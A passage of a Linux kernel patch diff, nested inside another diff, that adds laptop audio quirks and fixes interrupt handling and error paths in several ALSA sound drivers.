+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xd),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x1c));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xe),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x1e));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xf),
+-			     A_C_00000000, A_C_00000000);
++			/* A_P16VIN(0) is delayed by one sample, so all other A_P16VIN channels
++			 * will need to also be delayed; we use an auxiliary register for that. */
++			for (z = 1; z < 0x10; z++) {
++				snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr), A_FXBUS2(z * 2) );
++				A_OP(icode, &ptr, iACC3, A_GPR(gpr), A_P16VIN(z), A_C_00000000, A_C_00000000);
++				gpr_map[gpr++] = 0x00000000;
++			}
+ 		}
+ 
+ #if 0
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 72fa1509cc4ba..cb34a62075b13 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -122,6 +122,7 @@ struct alc_spec {
+ 	unsigned int ultra_low_power:1;
+ 	unsigned int has_hs_key:1;
+ 	unsigned int no_internal_mic_pin:1;
++	unsigned int en_3kpull_low:1;
+ 
+ 	/* for PLL fix */
+ 	hda_nid_t pll_nid;
+@@ -3622,6 +3623,7 @@ static void alc256_shutup(struct hda_codec *codec)
+ 	if (!hp_pin)
+ 		hp_pin = 0x21;
+ 
++	alc_update_coefex_idx(codec, 0x57, 0x04, 0x0007, 0x1); /* Low power */
+ 	hp_pin_sense = snd_hda_jack_detect(codec, hp_pin);
+ 
+ 	if (hp_pin_sense)
+@@ -3638,8 +3640,7 @@ static void alc256_shutup(struct hda_codec *codec)
+ 	/* If disable 3k pulldown control for alc257, the Mic detection will not work correctly
+ 	 * when booting with headset plugged. So skip setting it for the codec alc257
+ 	 */
+-	if (codec->core.vendor_id != 0x10ec0236 &&
+-	    codec->core.vendor_id != 0x10ec0257)
++	if (spec->en_3kpull_low)
+ 		alc_update_coef_idx(codec, 0x46, 0, 3 << 12);
+ 
+ 	if (!spec->no_shutup_pins)
+@@ -4623,6 +4624,21 @@ static void alc236_fixup_hp_mute_led_coefbit(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc236_fixup_hp_mute_led_coefbit2(struct hda_codec *codec,
++					  const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
++		spec->mute_led_polarity = 0;
++		spec->mute_led_coef.idx = 0x07;
++		spec->mute_led_coef.mask = 1;
++		spec->mute_led_coef.on = 1;
++		spec->mute_led_coef.off = 0;
++		snd_hda_gen_add_mute_led_cdev(codec, coef_mute_led_set);
++	}
++}
++
+ /* turn on/off mic-mute LED per capture hook by coef bit */
+ static int coef_micmute_led_set(struct led_classdev *led_cdev,
+ 				enum led_brightness brightness)
+@@ -7133,6 +7149,7 @@ enum {
+ 	ALC285_FIXUP_HP_GPIO_LED,
+ 	ALC285_FIXUP_HP_MUTE_LED,
+ 	ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED,
++	ALC236_FIXUP_HP_MUTE_LED_COEFBIT2,
+ 	ALC236_FIXUP_HP_GPIO_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF,
+@@ -7203,6 +7220,7 @@ enum {
+ 	ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN,
+ 	ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS,
+ 	ALC236_FIXUP_DELL_DUAL_CODECS,
++	ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -8556,6 +8574,10 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_hp_spectre_x360_mute_led,
+ 	},
++	[ALC236_FIXUP_HP_MUTE_LED_COEFBIT2] = {
++	    .type = HDA_FIXUP_FUNC,
++	    .v.func = alc236_fixup_hp_mute_led_coefbit2,
++	},
+ 	[ALC236_FIXUP_HP_GPIO_LED] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc236_fixup_hp_gpio_led,
+@@ -9069,8 +9091,6 @@ static const struct hda_fixup alc269_fixups[] = {
+ 	[ALC287_FIXUP_CS35L41_I2C_2] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = cs35l41_fixup_i2c_two,
+-		.chained = true,
+-		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
+ 	},
+ 	[ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED] = {
+ 		.type = HDA_FIXUP_FUNC,
+@@ -9207,6 +9227,12 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 	},
++	[ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = cs35l41_fixup_i2c_two,
++		.chained = true,
++		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9440,6 +9466,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x886d, "HP ZBook Fury 17.3 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8870, "HP ZBook Fury 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8873, "HP ZBook Studio 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
++	SND_PCI_QUIRK(0x103c, 0x887a, "HP Laptop 15s-eq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x888d, "HP ZBook Power 15.6 inch G8 Mobile Workstation PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8895, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_SPEAKERS_MICMUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8896, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_MUTE_LED),
+@@ -9644,6 +9671,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51b1, "Clevo NS50AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x51b3, "Clevo NS70AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9727,14 +9755,14 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22be, "Thinkpad X1 Carbon 8th", ALC285_FIXUP_THINKPAD_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c1, "Thinkpad P1 Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c2, "Thinkpad X1 Extreme Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+-	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+@@ -10599,6 +10627,8 @@ static int patch_alc269(struct hda_codec *codec)
+ 		spec->shutup = alc256_shutup;
+ 		spec->init_hook = alc256_init;
+ 		spec->gen.mixer_nid = 0; /* ALC256 does not have any loopback mixer path */
++		if (codec->bus->pci->vendor == PCI_VENDOR_ID_AMD)
++			spec->en_3kpull_low = true;
+ 		break;
+ 	case 0x10ec0257:
+ 		spec->codec_variant = ALC269_TYPE_ALC257;
+diff --git a/sound/soc/amd/acp/amd.h b/sound/soc/amd/acp/amd.h
+index 5f2119f422715..12a176a50fd6e 100644
+--- a/sound/soc/amd/acp/amd.h
++++ b/sound/soc/amd/acp/amd.h
+@@ -173,7 +173,7 @@ int snd_amd_acp_find_config(struct pci_dev *pci);
+ 
+ static inline u64 acp_get_byte_count(struct acp_dev_data *adata, int dai_id, int direction)
+ {
+-	u64 byte_count, low = 0, high = 0;
++	u64 byte_count = 0, low = 0, high = 0;
+ 
+ 	if (direction == SNDRV_PCM_STREAM_PLAYBACK) {
+ 		switch (dai_id) {
+@@ -191,7 +191,7 @@ static inline u64 acp_get_byte_count(struct acp_dev_data *adata, int dai_id, int
+ 			break;
+ 		default:
+ 			dev_err(adata->dev, "Invalid dai id %x\n", dai_id);
+-			return -EINVAL;
++			goto POINTER_RETURN_BYTES;
+ 		}
+ 	} else {
+ 		switch (dai_id) {
+@@ -213,12 +213,13 @@ static inline u64 acp_get_byte_count(struct acp_dev_data *adata, int dai_id, int
+ 			break;
+ 		default:
+ 			dev_err(adata->dev, "Invalid dai id %x\n", dai_id);
+-			return -EINVAL;
++			goto POINTER_RETURN_BYTES;
+ 		}
+ 	}
+ 	/* Get 64 bit value from two 32 bit registers */
+ 	byte_count = (high << 32) | low;
+ 
++POINTER_RETURN_BYTES:
+ 	return byte_count;
+ }
+ 
+diff --git a/sound/soc/codecs/cs42l51-i2c.c b/sound/soc/codecs/cs42l51-i2c.c
+index 85238339fbcab..b2085ff4b3226 100644
+--- a/sound/soc/codecs/cs42l51-i2c.c
++++ b/sound/soc/codecs/cs42l51-i2c.c
+@@ -19,6 +19,12 @@ static struct i2c_device_id cs42l51_i2c_id[] = {
+ };
+ MODULE_DEVICE_TABLE(i2c, cs42l51_i2c_id);
+ 
++const struct of_device_id cs42l51_of_match[] = {
++	{ .compatible = "cirrus,cs42l51", },
++	{ }
++};
++MODULE_DEVICE_TABLE(of, cs42l51_of_match);
++
+ static int cs42l51_i2c_probe(struct i2c_client *i2c)
+ {
+ 	struct regmap_config config;
+diff --git a/sound/soc/codecs/cs42l51.c b/sound/soc/codecs/cs42l51.c
+index e88d9ff95cdfc..4b832d52f643f 100644
+--- a/sound/soc/codecs/cs42l51.c
++++ b/sound/soc/codecs/cs42l51.c
+@@ -826,13 +826,6 @@ int __maybe_unused cs42l51_resume(struct device *dev)
+ }
+ EXPORT_SYMBOL_GPL(cs42l51_resume);
+ 
+-const struct of_device_id cs42l51_of_match[] = {
+-	{ .compatible = "cirrus,cs42l51", },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(of, cs42l51_of_match);
+-EXPORT_SYMBOL_GPL(cs42l51_of_match);
+-
+ MODULE_AUTHOR("Arnaud Patard <arnaud.patard@rtp-net.org>");
+ MODULE_DESCRIPTION("Cirrus Logic CS42L51 ALSA SoC Codec Driver");
+ MODULE_LICENSE("GPL");
+diff --git a/sound/soc/codecs/cs42l51.h b/sound/soc/codecs/cs42l51.h
+index a79343e8a54ea..125703ede1133 100644
+--- a/sound/soc/codecs/cs42l51.h
++++ b/sound/soc/codecs/cs42l51.h
+@@ -16,7 +16,6 @@ int cs42l51_probe(struct device *dev, struct regmap *regmap);
+ void cs42l51_remove(struct device *dev);
+ int __maybe_unused cs42l51_suspend(struct device *dev);
+ int __maybe_unused cs42l51_resume(struct device *dev);
+-extern const struct of_device_id cs42l51_of_match[];
+ 
+ #define CS42L51_CHIP_ID			0x1B
+ #define CS42L51_CHIP_REV_A		0x00
+diff --git a/sound/soc/codecs/rt5640.c b/sound/soc/codecs/rt5640.c
+index 0f8e6dd214b0d..a7071d0a2562f 100644
+--- a/sound/soc/codecs/rt5640.c
++++ b/sound/soc/codecs/rt5640.c
+@@ -2562,9 +2562,10 @@ static void rt5640_enable_jack_detect(struct snd_soc_component *component,
+ 	if (jack_data && jack_data->use_platform_clock)
+ 		rt5640->use_platform_clock = jack_data->use_platform_clock;
+ 
+-	ret = request_irq(rt5640->irq, rt5640_irq,
+-			  IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
+-			  "rt5640", rt5640);
++	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
++					NULL, rt5640_irq,
++					IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
++					"rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to reguest IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640_disable_jack_detect(component);
+@@ -2617,8 +2618,9 @@ static void rt5640_enable_hda_jack_detect(
+ 
+ 	rt5640->jack = jack;
+ 
+-	ret = request_irq(rt5640->irq, rt5640_irq,
+-			  IRQF_TRIGGER_RISING | IRQF_ONESHOT, "rt5640", rt5640);
++	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
++					NULL, rt5640_irq, IRQF_TRIGGER_RISING | IRQF_ONESHOT,
++					"rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to reguest IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640->irq = -ENXIO;
+diff --git a/sound/soc/codecs/wcd-mbhc-v2.c b/sound/soc/codecs/wcd-mbhc-v2.c
+index 1911750f7445c..5da1934527f34 100644
+--- a/sound/soc/codecs/wcd-mbhc-v2.c
++++ b/sound/soc/codecs/wcd-mbhc-v2.c
+@@ -1454,7 +1454,7 @@ struct wcd_mbhc *wcd_mbhc_init(struct snd_soc_component *component,
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
+-	mbhc = devm_kzalloc(dev, sizeof(*mbhc), GFP_KERNEL);
++	mbhc = kzalloc(sizeof(*mbhc), GFP_KERNEL);
+ 	if (!mbhc)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -1474,61 +1474,76 @@ struct wcd_mbhc *wcd_mbhc_init(struct snd_soc_component *component,
+ 
+ 	INIT_WORK(&mbhc->correct_plug_swch, wcd_correct_swch_plug);
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_sw_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_sw_intr, NULL,
+ 					wcd_mbhc_mech_plug_detect_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"mbhc sw intr", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_mbhc;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_btn_press_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_btn_press_intr, NULL,
+ 					wcd_mbhc_btn_press_handler,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Button Press detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_sw_intr;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_btn_release_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_btn_release_intr, NULL,
+ 					wcd_mbhc_btn_release_handler,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Button Release detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_btn_press_intr;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_hs_ins_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_hs_ins_intr, NULL,
+ 					wcd_mbhc_adc_hs_ins_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Elect Insert", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_btn_release_intr;
+ 
+ 	disable_irq_nosync(mbhc->intr_ids->mbhc_hs_ins_intr);
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_hs_rem_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_hs_rem_intr, NULL,
+ 					wcd_mbhc_adc_hs_rem_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Elect Remove", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_hs_ins_intr;
+ 
+ 	disable_irq_nosync(mbhc->intr_ids->mbhc_hs_rem_intr);
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->hph_left_ocp, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->hph_left_ocp, NULL,
+ 					wcd_mbhc_hphl_ocp_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"HPH_L OCP detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_hs_rem_intr;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->hph_right_ocp, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->hph_right_ocp, NULL,
+ 					wcd_mbhc_hphr_ocp_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"HPH_R OCP detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_hph_left_ocp;
+ 
+ 	return mbhc;
+-err:
++
++err_free_hph_left_ocp:
++	free_irq(mbhc->intr_ids->hph_left_ocp, mbhc);
++err_free_hs_rem_intr:
++	free_irq(mbhc->intr_ids->mbhc_hs_rem_intr, mbhc);
++err_free_hs_ins_intr:
++	free_irq(mbhc->intr_ids->mbhc_hs_ins_intr, mbhc);
++err_free_btn_release_intr:
++	free_irq(mbhc->intr_ids->mbhc_btn_release_intr, mbhc);
++err_free_btn_press_intr:
++	free_irq(mbhc->intr_ids->mbhc_btn_press_intr, mbhc);
++err_free_sw_intr:
++	free_irq(mbhc->intr_ids->mbhc_sw_intr, mbhc);
++err_free_mbhc:
++	kfree(mbhc);
++
+ 	dev_err(dev, "Failed to request mbhc interrupts %d\n", ret);
+ 
+ 	return ERR_PTR(ret);
+@@ -1537,9 +1552,19 @@ EXPORT_SYMBOL(wcd_mbhc_init);
+ 
+ void wcd_mbhc_deinit(struct wcd_mbhc *mbhc)
+ {
++	free_irq(mbhc->intr_ids->hph_right_ocp, mbhc);
++	free_irq(mbhc->intr_ids->hph_left_ocp, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_hs_rem_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_hs_ins_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_btn_release_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_btn_press_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_sw_intr, mbhc);
++
+ 	mutex_lock(&mbhc->lock);
+ 	wcd_cancel_hs_detect_plug(mbhc,	&mbhc->correct_plug_swch);
+ 	mutex_unlock(&mbhc->lock);
++
++	kfree(mbhc);
+ }
+ EXPORT_SYMBOL(wcd_mbhc_deinit);
+ 
+diff --git a/sound/soc/codecs/wcd934x.c b/sound/soc/codecs/wcd934x.c
+index 28175c746b9ae..0b5999c819db9 100644
+--- a/sound/soc/codecs/wcd934x.c
++++ b/sound/soc/codecs/wcd934x.c
+@@ -3044,6 +3044,17 @@ static int wcd934x_mbhc_init(struct snd_soc_component *component)
+ 
+ 	return 0;
+ }
++
++static void wcd934x_mbhc_deinit(struct snd_soc_component *component)
++{
++	struct wcd934x_codec *wcd = snd_soc_component_get_drvdata(component);
++
++	if (!wcd->mbhc)
++		return;
++
++	wcd_mbhc_deinit(wcd->mbhc);
++}
++
+ static int wcd934x_comp_probe(struct snd_soc_component *component)
+ {
+ 	struct wcd934x_codec *wcd = dev_get_drvdata(component->dev);
+@@ -3077,6 +3088,7 @@ static void wcd934x_comp_remove(struct snd_soc_component *comp)
+ {
+ 	struct wcd934x_codec *wcd = dev_get_drvdata(comp->dev);
+ 
++	wcd934x_mbhc_deinit(comp);
+ 	wcd_clsh_ctrl_free(wcd->clsh_ctrl);
+ }
+ 
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index 1d801a7b1469d..2316481c2541b 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -210,7 +210,7 @@ struct wcd938x_priv {
+ };
+ 
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(ear_pa_gain, 600, -1800);
+-static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(line_gain, 600, -3000);
++static const DECLARE_TLV_DB_SCALE(line_gain, -3000, 150, -3000);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(analog_gain, 0, 3000);
+ 
+ struct wcd938x_mbhc_zdet_param {
+@@ -2165,8 +2165,8 @@ static inline void wcd938x_mbhc_get_result_params(struct wcd938x_priv *wcd938x,
+ 	else if (x1 < minCode_param[noff])
+ 		*zdet = WCD938X_ZDET_FLOATING_IMPEDANCE;
+ 
+-	pr_err("%s: d1=%d, c1=%d, x1=0x%x, z_val=%d(milliOhm)\n",
+-		__func__, d1, c1, x1, *zdet);
++	pr_debug("%s: d1=%d, c1=%d, x1=0x%x, z_val=%d (milliohm)\n",
++		 __func__, d1, c1, x1, *zdet);
+ ramp_down:
+ 	i = 0;
+ 	while (x1) {
+@@ -2625,6 +2625,8 @@ static int wcd938x_mbhc_init(struct snd_soc_component *component)
+ 						     WCD938X_IRQ_HPHR_OCP_INT);
+ 
+ 	wcd938x->wcd_mbhc = wcd_mbhc_init(component, &mbhc_cb, intr_ids, wcd_mbhc_fields, true);
++	if (IS_ERR(wcd938x->wcd_mbhc))
++		return PTR_ERR(wcd938x->wcd_mbhc);
+ 
+ 	snd_soc_add_component_controls(component, impedance_detect_controls,
+ 				       ARRAY_SIZE(impedance_detect_controls));
+@@ -2633,6 +2635,14 @@ static int wcd938x_mbhc_init(struct snd_soc_component *component)
+ 
+ 	return 0;
+ }
++
++static void wcd938x_mbhc_deinit(struct snd_soc_component *component)
++{
++	struct wcd938x_priv *wcd938x = snd_soc_component_get_drvdata(component);
++
++	wcd_mbhc_deinit(wcd938x->wcd_mbhc);
++}
++
+ /* END MBHC */
+ 
+ static const struct snd_kcontrol_new wcd938x_snd_controls[] = {
+@@ -2652,8 +2662,8 @@ static const struct snd_kcontrol_new wcd938x_snd_controls[] = {
+ 		       wcd938x_get_swr_port, wcd938x_set_swr_port),
+ 	SOC_SINGLE_EXT("DSD_R Switch", WCD938X_DSD_R, 0, 1, 0,
+ 		       wcd938x_get_swr_port, wcd938x_set_swr_port),
+-	SOC_SINGLE_TLV("HPHL Volume", WCD938X_HPH_L_EN, 0, 0x18, 0, line_gain),
+-	SOC_SINGLE_TLV("HPHR Volume", WCD938X_HPH_R_EN, 0, 0x18, 0, line_gain),
++	SOC_SINGLE_TLV("HPHL Volume", WCD938X_HPH_L_EN, 0, 0x18, 1, line_gain),
++	SOC_SINGLE_TLV("HPHR Volume", WCD938X_HPH_R_EN, 0, 0x18, 1, line_gain),
+ 	WCD938X_EAR_PA_GAIN_TLV("EAR_PA Volume", WCD938X_ANA_EAR_COMPANDER_CTL,
+ 				2, 0x10, 0, ear_pa_gain),
+ 	SOC_SINGLE_EXT("ADC1 Switch", WCD938X_ADC1, 1, 1, 0,
+@@ -3080,16 +3090,33 @@ static int wcd938x_irq_init(struct wcd938x_priv *wcd, struct device *dev)
+ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ {
+ 	struct wcd938x_priv *wcd938x = snd_soc_component_get_drvdata(component);
++	struct sdw_slave *tx_sdw_dev = wcd938x->tx_sdw_dev;
+ 	struct device *dev = component->dev;
++	unsigned long time_left;
+ 	int ret, i;
+ 
++	time_left = wait_for_completion_timeout(&tx_sdw_dev->initialization_complete,
++						msecs_to_jiffies(2000));
++	if (!time_left) {
++		dev_err(dev, "soundwire device init timeout\n");
++		return -ETIMEDOUT;
++	}
++
+ 	snd_soc_component_init_regmap(component, wcd938x->regmap);
+ 
++	ret = pm_runtime_resume_and_get(dev);
++	if (ret < 0)
++		return ret;
++
+ 	wcd938x->variant = snd_soc_component_read_field(component,
+ 						 WCD938X_DIGITAL_EFUSE_REG_0,
+ 						 WCD938X_ID_MASK);
+ 
+ 	wcd938x->clsh_info = wcd_clsh_ctrl_alloc(component, WCD938X);
++	if (IS_ERR(wcd938x->clsh_info)) {
++		pm_runtime_put(dev);
++		return PTR_ERR(wcd938x->clsh_info);
++	}
+ 
+ 	wcd938x_io_init(wcd938x);
+ 	/* Set all interrupts as edge triggered */
+@@ -3098,6 +3125,8 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 			     (WCD938X_DIGITAL_INTR_LEVEL_0 + i), 0);
+ 	}
+ 
++	pm_runtime_put(dev);
++
+ 	wcd938x->hphr_pdm_wd_int = regmap_irq_get_virq(wcd938x->irq_chip,
+ 						       WCD938X_IRQ_HPHR_PDM_WD_INT);
+ 	wcd938x->hphl_pdm_wd_int = regmap_irq_get_virq(wcd938x->irq_chip,
+@@ -3109,20 +3138,26 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 	ret = request_threaded_irq(wcd938x->hphr_pdm_wd_int, NULL, wcd938x_wd_handle_irq,
+ 				   IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 				   "HPHR PDM WD INT", wcd938x);
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "Failed to request HPHR WD interrupt (%d)\n", ret);
++		goto err_free_clsh_ctrl;
++	}
+ 
+ 	ret = request_threaded_irq(wcd938x->hphl_pdm_wd_int, NULL, wcd938x_wd_handle_irq,
+ 				   IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 				   "HPHL PDM WD INT", wcd938x);
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "Failed to request HPHL WD interrupt (%d)\n", ret);
++		goto err_free_hphr_pdm_wd_int;
++	}
+ 
